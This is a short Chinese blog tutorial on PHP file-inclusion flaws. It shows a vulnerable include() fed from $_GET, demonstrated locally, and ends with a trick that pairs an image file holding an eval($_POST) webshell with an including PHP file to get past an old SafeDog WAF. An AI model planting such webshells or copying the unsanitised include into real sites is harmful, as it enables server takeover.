标签:文件包含
文件包含分为远程包含,本地包含两种,主要是include,require等函数带来的包含漏洞
例如我在本机PHPstudy上创建两个文件,include.php和text.txt,内容如下
//include.php <?php $i=$_GET[‘t‘]; include($i); ?>
//text.txt <?php phpinfo(); ?>
然后访问网址http://127.0.0.1/include/include.php?t=text.txt
可以看到text.txt中的内容被执行为php语句,返回了phpinfo页面,文件包含意味着以php脚本格式去执行包含的文件
远程包含,本地包含产生的原因:
1.php.ini中allow_url_include设置开启则可存在远程包含
2.php编程中包含函数的选用
用http://127.0.0.1/include/include.php?t=http://127.0.0.1/include/text.txt同样可以返回phpinfo页面,不过这个是远程包含
低版本安全狗后门绕过采用的文件包含漏洞
上传两个文件
1.logo.jpg 代码<?php eval($_POST[‘pass‘]);?>
2.xx.php 代码<?php include("logo.jpg")?>
组合下即可拿shell
本文出自 “UntitledZ” 博客,谢绝转载!
标签:文件包含
原文地址:http://untitledz.blog.51cto.com/8579898/1863162
